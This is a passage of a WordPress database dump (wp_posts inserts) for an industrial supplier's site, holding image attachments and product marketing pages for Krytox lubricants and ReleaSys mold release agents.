INSERT INTO `wp_posts` VALUES (378, 2, '2016-08-18 12:38:00', '2016-08-18 12:38:00', '', 'Chemours Krytox Grease 2 oz tube 300 dpi', '', 'inherit', 'open', 'closed', '', 'chemours-krytox-grease-2-oz-tube-300-dpi', '', '', '2016-08-18 12:38:00', '2016-08-18 12:38:00', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/Chemours-Krytox-Grease-2-oz-tube-300-dpi.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (379, 2, '2016-08-18 12:38:03', '2016-08-18 12:38:03', '', 'Chemours Krytox Grease 5 & 7 Kg Pail 300 dpi', '', 'inherit', 'open', 'closed', '', 'chemours-krytox-grease-5-7-kg-pail-300-dpi', '', '', '2016-08-18 12:38:03', '2016-08-18 12:38:03', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/Chemours-Krytox-Grease-5-7-Kg-Pail-300-dpi.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (380, 2, '2016-08-18 12:38:07', '2016-08-18 12:38:07', '', 'Chemours Krytox Grease 8 oz tube 300 dpi', '', 'inherit', 'open', 'closed', '', 'chemours-krytox-grease-8-oz-tube-300-dpi', '', '', '2016-08-18 12:38:07', '2016-08-18 12:38:07', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/Chemours-Krytox-Grease-8-oz-tube-300-dpi.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (381, 2, '2016-08-18 12:38:10', '2016-08-18 12:38:10', '', 'Chemours Krytox Grease 20 kg 44.1 lb  Pail 300 dpi', '', 'inherit', 'open', 'closed', '', 'chemours-krytox-grease-20-kg-44-1-lb-pail-300-dpi', '', '', '2016-08-18 12:38:10', '2016-08-18 12:38:10', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/Chemours-Krytox-Grease-20-kg-44.1-lb-Pail-300-dpi.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (382, 2, '2016-08-18 12:38:15', '2016-08-18 12:38:15', '', 'Chemours Krytox Group Combo Scale 300 dpi', '', 'inherit', 'open', 'closed', '', 'chemours-krytox-group-combo-scale-300-dpi', '', '', '2016-08-18 12:38:15', '2016-08-18 12:38:15', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/Chemours-Krytox-Group-Combo-Scale-300-dpi.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (383, 2, '2016-08-18 12:38:19', '2016-08-18 12:38:19', '', 'Chemours Krytox Group Grease Scale 300 dpi', '', 'inherit', 'open', 'closed', '', 'chemours-krytox-group-grease-scale-300-dpi', '', '', '2016-08-18 12:38:19', '2016-08-18 12:38:19', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/Chemours-Krytox-Group-Grease-Scale-300-dpi.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (384, 2, '2016-08-18 12:38:22', '2016-08-18 12:38:22', '', 'Chemours Krytox Group Oil Scale 300 dpi', '', 'inherit', 'open', 'closed', '', 'chemours-krytox-group-oil-scale-300-dpi', '', '', '2016-08-18 12:38:22', '2016-08-18 12:38:22', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/Chemours-Krytox-Group-Oil-Scale-300-dpi.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (385, 2, '2016-08-18 12:38:24', '2016-08-18 12:38:24', '', 'Chemours Krytox OIL 0.5 kg Jar 300 dpi', '', 'inherit', 'open', 'closed', '', 'chemours-krytox-oil-0-5-kg-jar-300-dpi', '', '', '2016-08-18 12:38:24', '2016-08-18 12:38:24', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/Chemours-Krytox-OIL-0.5-kg-Jar-300-dpi.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (386, 2, '2016-08-18 12:38:27', '2016-08-18 12:38:27', '', 'Chemours Krytox OIL 1 kg Bottle 300 dpi', '', 'inherit', 'open', 'closed', '', 'chemours-krytox-oil-1-kg-bottle-300-dpi', '', '', '2016-08-18 12:38:27', '2016-08-18 12:38:27', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/Chemours-Krytox-OIL-1-kg-Bottle-300-dpi.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (387, 2, '2016-08-18 12:38:29', '2016-08-18 12:38:29', '', 'Chemours Krytox OIL 5 kg Handle Jug 300 dpi', '', 'inherit', 'open', 'closed', '', 'chemours-krytox-oil-5-kg-handle-jug-300-dpi', '', '', '2016-08-18 12:38:29', '2016-08-18 12:38:29', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/Chemours-Krytox-OIL-5-kg-Handle-Jug-300-dpi.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (388, 2, '2016-08-18 12:38:33', '2016-08-18 12:38:33', '', 'Chemours Krytox OIL 20 kg 5gal Jug 300 dpi', '', 'inherit', 'open', 'closed', '', 'chemours-krytox-oil-20-kg-5gal-jug-300-dpi', '', '', '2016-08-18 12:38:33', '2016-08-18 12:38:33', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/Chemours-Krytox-OIL-20-kg-5gal-Jug-300-dpi.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (389, 2, '2016-08-18 12:38:38', '2016-08-18 12:38:38', '', 'Dab-O-Matic', '', 'inherit', 'open', 'closed', '', 'dab-o-matic', '', '', '2016-08-18 12:38:38', '2016-08-18 12:38:38', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/Dab-O-Matic.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (390, 2, '2016-08-18 12:38:45', '2016-08-18 12:38:45', '', 'Needle Nose', '', 'inherit', 'open', 'closed', '', 'needle-nose', '', '', '2016-08-18 12:38:45', '2016-08-18 12:38:45', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/Needle-Nose.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (391, 2, '2016-08-18 12:38:51', '2016-08-18 12:38:51', '', 'Syringe', '', 'inherit', 'open', 'closed', '', 'syringe', '', '', '2016-08-18 12:38:51', '2016-08-18 12:38:51', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/Syringe.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (393, 2, '2016-10-12 18:36:28', '2016-10-12 18:36:28', 'Krytox GPL 200 grease is the product of choice in extreme temperature conditions. Most petroleum products begin to degrade above 99 °C (210 °F) and are too viscous at temperatures just below – 8 °C (0 °F). Under the D-3336 test conditions of 177 °C (350 °F) and 10,000 rpm, the majority of competing hydrocarbon lubricants fail in less than 1,000 hr. But, the general purpose line of Krytox lubricants has been shown to last over 5,000 hr without failure, even at an increased temperature of 200 °C (392 °F). This extreme condition performance is what distinguishes Krytox performance lubricants from other competing products.\n\nKrytox GPL 200 grease is cost-effective across a wide range of applications. Due to their inert nature, Krytox lubricants provide a much longer usable life as compared to typical hydrocarbon oils and greases; and the longer usable life allows them to remain for considerable periods of time before needing to be replaced, if they are replaced at all. That translates to savings over time, both by lowering the amount of lubricant purchased and any downtime incurred during re-lubrication.\n\nStandard Krytox lubricants contain only carbon, oxygen, and fluorine; whereas, hydrocarbons contain hydrogen. The absence of hydrogen greatly increases the stability of the lubricants and renders them nonflammable with no flash point. They will not burn or support combustion, even in an environment of 100% liquid or gaseous oxygen.\n\nKrytox performance lubricants are not only resistant to oxygen, but they are also inert to virtually all chemicals used in a variety of industries. They are insoluble in most solvents, but are soluble in highly fluorinated fluids and some super critical fluids, such as CO2.\n\nAt elevated temperatures and pressures, PFPE oils are highly resistant to attack by gaseous and liquid oxygen. As a result, Krytox oils and greases have become preferred lubricants in the oxygen manufacturing industry and in those industries that use oxygen.\n\nPrepping a bearing for Krytox is a simple process. Click here\n\n<a href="https://www.miller-stephenson.com/krytox-h-1-food-grade-lubricants/">To learn more about Krytox NSF H-1 Rated Food Grade Lubricants click here.</a>\n\n<a href="https://www.miller-stephenson.com/krytox-automotive-lubricants/">To learn more about Krytox Automotive Solutions click here.</a>\n\n<a href="https://www.miller-stephenson.com/krytox-noise-vibration-harshness/">To learn more about Krytox Automotive Noise, Harshness and Vibration solutions click here. </a>\n\n<a href="https://www.miller-stephenson.com/krytox-faq/">For the Krytox Frequently asked questions (FAQ) click here.</a>\n\n<a href="https://www.miller-stephenson.com/krytox/">For a general Krytox application overview, click here.</a>\n\n<a href="https://www.miller-stephenson.com/krytox-product-selection-guide/">With help regarding which Krytox grease is right for you, click here.</a>', 'GPL 200', 'Krytox GPL 200 has a Oil Viscosity of 5.5 cSt at 40°C. GPL 200 is the least viscous and GPL 207 is the most viscous.\n<br/><br/>\nEstimated useful temperature range is -70°C to 66°C.\n<br/><br/>\n<img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-authorized-distributor-3-e1474291247159.jpg" alt="Krytox Authorized Distributor" />', 'inherit', 'closed', 'closed', '', '347-autosave-v1', '', '', '2016-10-12 18:36:28', '2016-10-12 18:36:28', '', 347, 'https://132.148.10.86/wordpress/347-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (400, 3, '2016-08-18 12:56:18', '2016-08-18 12:56:18', '<h2>ReleaSys 82 | Water-based PTFE Release Agent</h2>\r\n<h3>Advanced Fluoropolymer Chemistry; Exceptional Release Properties; No Transfer</h3>\r\nReleaSys 82 is an aerosolized water-based, semi-permanent dry film release agent designed to provide reliable, consistent release across a broad range of moldable substrates.  Properly applied, our product develops a durable, thin-film on the mold surface with minimal mold build-up.  ReleaSys 82 water-based PTFE release agent will not interfere with post-production finishing operation and is ideal for Rubber to Metal Bonding operations. Benefits of this product include:\r\n<ul>\r\n 	<li>High durability; Surface activation chemistry</li>\r\n 	<li>Ideal for lower complexity molds</li>\r\n 	<li>Ideal for Rubber to Metal Bonding</li>\r\n 	<li>Improves quality and consistency of molded parts</li>\r\n</ul>\r\nSemi-permanent release agents are state-of-the-art release systems that provide the molding industry with an alternative to the traditional high volume, apply-every-cycle release agent. Miller-Stephenson has developed the ReleaSys product line in an effort to offer a high efficiency, cost-effective, and technologically advanced release agent to our customers. Our semi-permanent release agents forms a chemical bond to the mold surface which results in exceptional surface adhesion, durability, and application efficiency. All variants of the ReleaSys Series will deliver higher productivity, lower rejection rates, and higher quality products even in the most demanding applications. We offer various slip-levels and have specialized formulations for differing polymer types and molding processes ( ie: injection, transfer, compression). Miller-Stephenson has developed ReleaSys formulations to be applicable in virtually all types of composites, elastomers and organic polymers.\r\n<h3>Water-based PTFE Release Agent; High Application Efficiency</h3>\r\nThe application efficiency of ReleaSys can be seen by the relatively small amounts of Dry Film Release Agent that needs to be applied to the mold surface to give numerous releases.  This small volume needed means that storage space is reduced and cost per application is minimized. ReleaSys 82 Water-based PTFE Release Agent is formulated ready-to-use, making dilution equipment redundant. Overall, our mold release agents represent an added-value proposition that can be tailored to many types of molding applications. Miller-Stephenson has spend years improving and tailoring our mold release agents to deliver the highest value proposition by increase efficiency, reducing over-application, and enhancing finished part quality and consistency.\r\n\r\n<a href="https://www.miller-stephenson.com/mold-release-application-guide/"><strong>For help with application or troubleshooting concerns while using ReleaSys.</strong></a>\r\n\r\n<strong><a href="https://www.miller-stephenson.com/mold-release-agents/">If you would like more information on which mold release agent is right for you click here</a></strong>', 'ReleaSys 82 | Water-based PTFE Release Agent', 'ReleaSys 82 is an aerosolized water-based, semi-permanent dry film mold release agent designed to provide reliable, consistent release across a broad range of moldable substrates.  Properly applied, our product develops a durable, thin-film on the mold surface with minimal mold build-up.  ReleaSys 82 will not interfere with post-production finishing operation. Benefits of this product include:\r\n<ul>\r\n 	<li>High durability; Surface activation chemistry</li>\r\n 	<li>Ideal for lower complexity molds</li>\r\n 	<li>Ideal for Rubber to Metal Bonding</li>\r\n 	<li>Improves quality and consistency of molded parts</li>\r\n</ul>', 'publish', 'closed', 'closed', '', 'water-based-ptfe-release-agent', '', '', '2017-06-05 12:07:09', '2017-06-05 12:07:09', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=400', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (401, 3, '2016-08-18 12:55:57', '2016-08-18 12:55:57', '', 'Water-based PTFE Release Agent', '', 'inherit', 'open', 'closed', '', 'windmill-releasys82', '', '', '2016-11-23 13:16:14', '2016-11-23 13:16:14', '', 400, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/Windmill-ReleaSys82.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (402, 2, '2016-08-18 13:09:51', '2016-08-18 13:09:51', 'Krytox GPL 210 heavy-duty grease is used for high loading or slow speeds. EP greases have high load-carrying capability and good lubrication characteristics under boundary and mixed friction conditions. In addition to the EP additive in Krytox GPL 210 heavy-duty grease, Krytox oil provides adequate EP protection as an oil by itself, due to the viscosity build under load and its unique tribochemistry. \r\n\r\nA common test for analyzing EP performance is the Timken EP method, ASTM D2509. The test is performed by applying pressure between a rotating steel cup and a steel block and simulates line contact conditions. Two conditions are observed; the OK Load is the highest load at which no seizing or welding occurs, and it also reflects the load-carrying capability of the lubricant. The\r\nScore Load is the lowest load at which seizing or welding is observed. The scar width, which is the average scar width at the load corresponding to the OK load valve, is also recorded. \r\n\r\nAnother common test for analyzing EP performance is the Four Ball EP, ASTM D2596. The test is performed by steadily increasing the load on a rotating steel ball in contact with three fixed balls until they seize and welding occurs, which simulates point contact conditions. The lowest load at which this welding occurs is called the Weld Point. From this data, the load wear index (LWI) is calculated, which is a value that relates how well the grease prevents wear when operating below the weld point. For many competing greases, the LWI can generally fall between 50 and 100. Krytox greases typically have an LWI well above 100. This further shows how in addition to extreme condition performance, Krytox™ can also outperform most competitive greases in extreme pressure performance\r\n\r\nOne of the greatest advantages of using Krytox lubricants is stability in a wide variety of operating conditions and environments. This inert nature is what allows Krytox oils and greases to outlast and outperform competing hydrocarbon products.', 'GPL 210', 'Krytox GPL 210 has a Oil Viscosity of 5.5 cSt at 40°C.\r\n<br /><br />\r\nEstimated useful temperature range is -70°C to 66°C.\r\n<br /><br />\r\n<img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-authorized-distributor-3-e1474291247159.jpg" alt="Krytox Authorized Distributor" />', 'publish', 'open', 'closed', '', 'krytox-gpl-210', '', '', '2016-10-04 13:59:04', '2016-10-04 13:59:04', '', 0, 'https://132.148.10.86/wordpress/product/gpl-210/', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (410, 2, '2016-08-18 13:14:12', '2016-08-18 13:14:12', 'The Krytox GPL 220 grease contains an anti-corrosion/anti-wear inhibitor and is ideal for corrosive environments where there is no danger of the sodium nitrite additive reacting with chemicals or causing contamination problems. Typical applications are automotive bearings, sealed pump bearings, electric motor bearings, and general purpose bearings. Krytox oils and greases are silicone free. They do not contain any VOC materials or chlorine and are not hazardous to the atmosphere or ozone layer. They are biologically and environmentally inert.\r\n\r\nThe fully fluorinated Krytox GPL 220 high-temperature stability provides bottom-line savings from improved reliability and a reduction in grease usage and manpower through extended relubrication intervals. Excellent film strength reduces wear to reduce maintenance costs. Under high loads the viscosity increases to provide support and absorb the pressure.\r\n\r\nNew components often have organic rust preventive oils or greases on them to prevent damage while they are in storage before use. New bearings should be inspected for damage and cleanliness before use. The components must be completely cleaned of greases or preservative oils when using Krytox as a lubricant. Failure to do so could result in reduced bearing life. Bearing life tests on un-cleaned bearings have shown reduced life in high temperature, high speed tests where the bearing was filled with a minimum amount of grease. The preservatives coat the metal surface to prevent rusting so they can also prevent the grease from adhering, causing them to be thrown off by the action of the bearing. They could also oxidize and harden and can create debris which will contaminate the grease. \r\n\r\nKrytox lubricants provide longer lasting lubrication that reduces frequency of re-lubrication, not only reducing operating costs, but also reducing waste and potential impact on the environment. Krytox lubricants are undamaged by, and non-reactive with, acidic or caustic cleaners and disinfectants, steam, moisture or high temperatures. The original properties of the fluids can be restored through regeneration; thus, reducing or minimizing disposal and incineration. Chemours has a regeneration program that reclaims PFPE fluid. This lowers the overall cost of the fluids, and reduces or minimizes safety and environmental disposal problems.\r\n', 'GPL 220', 'Krytox GPL 220 has a Oil Viscosity of 5.5 cSt at 40°C. \r\n<br /><br />\r\nEstimated useful temperature range is -70°C to 66°C.\r\n<br /><br />\r\n<img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-authorized-distributor-3-e1474291247159.jpg" alt="Krytox Authorized Distributor" />', 'publish', 'open', 'closed', '', 'krytox-gpl-220', '', '', '2016-10-04 14:36:06', '2016-10-04 14:36:06', '', 0, 'https://132.148.10.86/wordpress/product/gpl-220/', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (419, 3, '2016-08-18 13:42:17', '2016-08-18 13:42:17', '<h2>ReleaSys™ 85 | Rubber Mold Release Agents</h2>\r\n<h3>Specifically Designed for the Rubber &amp; Elastomer Industry | No transfer and Ease of release</h3>\r\nReleaSys™ 85 is a highly versatile water-based, semi-permanent Rubber Mold Release Agents designed to exhibit superior durability, surface adhesion, and minimization of slip-stick.  Properly applied, our product develops a long lasting thin-film on the mold surface with minimal mold build-up. The aerosolized formula ensures proper application is achieved without the need for spray equipment.  ReleaSys 85 Elastomer / Rubber release agent will not interfere with post-production finishing operation. ReleaSys™ 85 was exceptional designed for operations which require high slip and zero transfer, such as rubber to metal bonding operations  Benefits of this product include:\r\n<ul>\r\n 	<li>Exceptional release agent durability</li>\r\n 	<li>Clean, Non-oily, Non-migrating</li>\r\n 	<li>Ideal for lower complexity molds</li>\r\n 	<li>Improves quality and consistency of molded parts</li>\r\n 	<li>Minimizes mold build-up and fouling</li>\r\n</ul>\r\n<span style="font-size: 11.0pt; font-family: \'Helvetica\',sans-serif; color: #555555;">Semi-permanent release agents are state-of-the-art release systems that provide the molding industry with an alternative to the traditional high volume, apply-every-cycle release agent. Miller-Stephenson has developed the ReleaSys product line in an effort to offer a high efficiency, cost-effective, and technologically advanced release agent to our customers. Our semi-permanent elastomer release agents forms a chemical bond to the mold surface which results in exceptional surface adhesion, durability, and application efficiency. All variants of the ReleaSys Series will deliver higher productivity, lower rejection rates, and higher quality products even in the most demanding applications. We offer various slip-levels and have specialized formulations for differing polymer types and molding processes ( ie: injection, transfer, compression). Miller-Stephenson has developed ReleaSys formulations to be applicable in virtually all types of composites, elastomers and organic polymers.</span>\r\n<h3>Production Efficiency; Higher throughput; Reduced scrap rates</h3>\r\nBased on our extensive production-floor experience, working shoulder-to-shoulder with our rubber molding customers for decades, Miller-Stephenson is able to understand and differentiate the needs of your process. Factors such as compound type and hardness; production parameters such as molding temperature, molding process, mold shape/construction, rubber to substrate bonding; and post-molding requirements all factor into finding the right product. Hence the development of ReleaSys 85 rubber mold release agents was done to develop a single high-performance solution applicable in the complex industry of rubber and elastomer molding.\r\n<p style="font-variant-ligatures: normal; font-variant-caps: normal; orphans: 2; text-align: start; widows: 2; -webkit-text-stroke-width: 0px; word-spacing: 0px;"><span style="font-size: 11.0pt; font-family: \'Helvetica\',sans-serif; color: #555555;">The application efficiency of ReleaSys can be seen by the relatively small amounts of Rubber Mold Release Agents that needs to be applied to the mold surface to give numerous releases.  This small volume needed means that storage space is reduced and cost per application is minimized. Products are formulated ready-to-use, making dilution equipment redundant. Overall, our mold release agents represent an added-value proposition that can be tailored to many types of molding applications. Miller-Stephenson has spend years improving and tailoring our mold release agents to deliver the highest value proposition by increase efficiency, reducing over-application, and enhancing finished part quality and consistency.</span></p>\r\n<p style="font-variant-ligatures: normal; font-variant-caps: normal; orphans: 2; text-align: start; widows: 2; -webkit-text-stroke-width: 0px; word-spacing: 0px;"><a href="https://www.miller-stephenson.com/mold-release-application-guide/"><strong>For help with application or troubleshooting concerns while using ReleaSys.</strong></a></p>\r\n<strong><a href="https://www.miller-stephenson.com/mold-release-agents/">If you would like more information on which mold release agent is right for you click here</a></strong>', 'ReleaSys™ 85 | Rubber Mold Release Agents', 'ReleaSys 85 is a highly versatile water-based, semi-permanent mold release agent designed to exhibit superior durability, surface adhesion, and minimization of slip-stick.  Properly applied, our product develops a long lasting thin-film on the mold surface with minimal mold build-up. The aerosolized formula ensures proper application is achieved without the need for spray equipment.  ReleaSys 85 will not interfere with post-production finishing operation.  Benefits of this product include:\r\n<ul>\r\n 	<li>Medium Slip; No transfer</li>\r\n 	<li>Specialized from Rubber/Elastomers</li>\r\n 	<li>Ideal for lower complexity molds</li>\r\n 	<li>Improves quality and consistency of molded parts</li>\r\n 	<li>Minimizes mold build-up and fouling</li>\r\n</ul>', 'publish', 'closed', 'closed', '', 'rubber-mold-release-agents', '', '', '2017-06-04 18:10:01', '2017-06-04 18:10:01', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=419', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (420, 3, '2016-08-18 13:35:43', '2016-08-18 13:35:43', '', 'Rubber Mold Release Agents', '', 'inherit', 'open', 'closed', '', 'tire-molding-releasys-85', '', '', '2016-11-23 13:12:13', '2016-11-23 13:12:13', '', 419, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/Tire-molding-Releasys-85.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (421, 2, '2016-08-18 13:39:32', '2016-08-18 13:39:32', 'One of the greatest advantages of using Krytox GPL 100 oil is stability in a wide variety of operating conditions and environments. This inert nature is what allows Krytox oils and greases to outlast and outperform competing hydrocarbon products.\r\n\r\nStandard Krytox lubricants contain only carbon, oxygen, and fluorine; whereas, hydrocarbons contain hydrogen. The absence of hydrogen greatly increases the stability of the lubricants and renders them nonflammable with no flash point. They will not burn or support combustion, even in an environment of 100% liquid or gaseous oxygen.\r\n\r\nKrytox GPL 100 Oil is not only resistant to oxygen, but they are also inert to virtually all chemicals used in a variety of industries. They are insoluble in most solvents, but are soluble in highly fluorinated fluids and some super critical fluids, such as CO2.\r\n\r\nAt elevated temperatures and pressures, PFPE oils are highly resistant to attack by gaseous and liquid oxygen. As a result, Krytox oils and greases have become preferred lubricants in the oxygen manufacturing industry and in those industries that use oxygen.\r\n\r\nKrytox lubricants do not react with gaseous oxygen under shock loading or with liquid oxygen (LOX), nitrogen tetroxide, or inhibited red fuming nitric acid in impact tests. LOX impact tests were conducted in accordance with ASTM D2512. Other impact tests conducted at 214 J/cm2 (200 ft·lb/in2), according to the method described in ASTM Bulletin 250, also showed no reaction. Krytox lubricants have also been evaluated and certified by the BAM Federal Institute for Materials Research and Testing in Germany for reactivity with gaseous and liquid oxygen under pressure. Table 4, “Oxygen Compatibility of Krytox™ Lubricants,” shows oxygen compatibility of Krytox lubricants.\r\n\r\nKrytox GPL 100 oil is remarkably stable to radiation when compared with many materials used as lubricants or power fluids. Irradiation of Krytox lubricants causes minor depolymerization, with a consequent reduction in viscosity and formation of volatile products, but not solids or sludge. In one test exposure of a Krytox sample to an electron bombardment of 107 rad at ambient temperature in air resulted in a viscosity decrease of only 8%. The irradiated sample contained no sludge and was unchanged in appearance.', 'GPL 100', 'Krytox GPL 100 has a Oil Viscosity of 5.5 cSt at 40°C. \r\n<br /><br />\r\nEstimated useful temperature range is -70°C to 66°C.\r\n<br /><br />\r\n<img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-authorized-distributor-3-e1474291247159.jpg" alt="Krytox Authorized Distributor" />', 'publish', 'open', 'closed', '', 'krytox-gpl-100', '', '', '2016-10-04 14:56:49', '2016-10-04 14:56:49', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=421', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (422, 3, '2016-08-18 13:45:41', '2016-08-18 13:45:41', '', 'Vazo radical intiator', '', 'inherit', 'open', 'closed', '', 'vazo-radical-intiator', '', '', '2016-08-18 13:45:41', '2016-08-18 13:45:41', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/Vazo-radical-intiator.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (423, 3, '2016-08-18 14:00:23', '2016-08-18 14:00:23', '<h2>ReleaSys™ 88 | Water-based Mold Release Agent</h2>\r\n<h3>High Performance Chemistry; Eco-Friendly, Water-based mold release agent</h3>\r\nReleaSys™ 88 is a semi-permanent, high performance water-based mold release agent developed to yield unmatched durability and surface slip. This aerosolized formulation excels at releasing parts from complex, intricate mold geometries. Properly applied, our product develops a long lasting thin-film on the mold surface with minimal mold build-up. ReleaSys 88 Water-based Mold Release Agent will not interfere with post-production finishing operation. Benefits of this product include:\r\n<ul>\r\n 	<li>High Slip; Superior release agent durability</li>\r\n 	<li>Ideal for complex molds and substrates</li>\r\n 	<li>Minimizes mold build-up and fouling</li>\r\n 	<li>Clean, Non-oily, Non-migrating</li>\r\n</ul>\r\n<span style="font-size: 11.0pt; font-family: \'Helvetica\',sans-serif; color: #555555;">Semi-permanent release agents are state-of-the-art release systems that provide the molding industry with an alternative to the traditional high volume, apply-every-cycle release agent. Miller-Stephenson has developed the ReleaSys product line in an effort to offer a high efficiency, cost-effective, and technologically advanced release agent to our customers. Our semi-permanent release agents forms a chemical bond to the mold surface which results in exceptional surface adhesion, durability, and application efficiency. All variants of the ReleaSys Series will deliver higher productivity, lower rejection rates, and higher quality products even in the most demanding applications. We offer various slip-levels and have specialized formulations for differing polymer types and molding processes ( ie: injection, transfer, compression). Miller-Stephenson has developed ReleaSys formulations to be applicable in virtually all types of composites, elastomers and organic polymers.</span>\r\n<h3 style="font-variant-ligatures: normal; font-variant-caps: normal; orphans: 2; text-align: start; widows: 2; -webkit-text-stroke-width: 0px; word-spacing: 0px;">Numerous Releases per Application in the convenience of a Aerosol can</h3>\r\n<p style="font-variant-ligatures: normal; font-variant-caps: normal; orphans: 2; text-align: start; widows: 2; -webkit-text-stroke-width: 0px; word-spacing: 0px;"><span style="font-size: 11.0pt; font-family: \'Helvetica\',sans-serif; color: #555555;">The application efficiency of ReleaSys™ can be seen by the relatively small amounts of mold release agent that needs to be applied to the mold surface to give numerous releases.  This small volume needed means that storage space is reduced and cost per application is minimized. Products are formulated ready-to-use, making dilution equipment redundant. Overall, our mold release agents represent an added-value proposition that can be tailored to many types of molding applications. Miller-Stephenson has spend years improving and tailoring our mold release agents to deliver the highest value proposition by increase efficiency, reducing over-application, and enhancing finished part quality and consistency.</span></p>\r\n<p style="font-variant-ligatures: normal; font-variant-caps: normal; orphans: 2; text-align: start; widows: 2; -webkit-text-stroke-width: 0px; word-spacing: 0px;"><a href="https://www.miller-stephenson.com/mold-release-application-guide/">For help with application or troubleshooting concerns while using ReleaSys.</a></p>\r\n<a href="https://www.miller-stephenson.com/mold-release-agents/">For a guide on which Release agent systems are right for you click here</a>', 'ReleaSys™ 88 | Water-based Mold Release Agent', 'ReleaSys 88 is a high performance water-based, semi-permanent mold release system developed to yield unmatched durability and surface slip. This aerosolized formulation excels at releasing parts from complex, intricate mold geometries. Properly applied, our product develops a long lasting thin-film on the mold surface with minimal mold build-up. ReleaSys 88 will not interfere with post-production finishing operation. Benefits of this product include:\r\n<ul>\r\n 	<li>High Slip; Superior release agent durability</li>\r\n 	<li>Ideal for complex molds and substrates</li>\r\n 	<li>Minimizes mold build-up and fouling</li>\r\n 	<li>Water-based formulation</li>\r\n 	<li>Clean, Non-oily, Non-migrating</li>\r\n</ul>', 'publish', 'closed', 'closed', '', 'water-based-mold-release-agent', '', '', '2017-06-04 18:05:42', '2017-06-04 18:05:42', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=423', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (424, 3, '2016-08-18 14:00:07', '2016-08-18 14:00:07', 'Mold release agent using a water-based formula', 'Water-based Mold Release Agent', '', 'inherit', 'open', 'closed', '', 'airplane-window-releasys88', '', '', '2017-06-04 18:04:19', '2017-06-04 18:04:19', '', 423, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/Airplane-window-ReleaSys88.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (425, 3, '2016-08-18 14:18:13', '2016-08-18 14:18:13', '<h2>ReleaSys™ 89 | High-Performance Release Agents</h2>\r\n<h3>Advanced Mold Release Chemistry in the convenience of a Aerosol Can</h3>\r\nReleaSys™ 89 is a nonflammable, low odor solvent-based, semi-permanent release agents designed to provide superior durability and high slip across a broad range of moldable substrates. ReleaSys™ 89 is designed to function as a superior composite mold release agent, particularly effective at FRP composite. vacuum bagging, polyurethane / extrusion PU and mandrel lay-up applications.  Properly applied, our product develops a durable, thin-film on the mold surface with minimal build-up.  This formulation is particularly effective on difficult molding application or abrasive substrates. ReleaSys 89 will not interfere with post-production finishing operation. Benefits of this product include:\r\n<ul>\r\n 	<li>Exceptional durability and surface adhesion</li>\r\n 	<li>High Slip;Ideal for complex mold geometries</li>\r\n 	<li>Improves quality of molded parts</li>\r\n 	<li>Minimal mold build up</li>\r\n</ul>\r\nSemi-permanent release agents are state-of-the-art release systems that provide the molding industry with an alternative to the traditional high volume, apply-every-cycle release agent. Miller-Stephenson has developed the ReleaSys product line in an effort to offer a high efficiency, cost-effective, and technologically advanced release agent to our customers. Our semi-permanent release agents forms a chemical bond to the mold surface which results in exceptional surface adhesion, durability, and application efficiency. All variants of 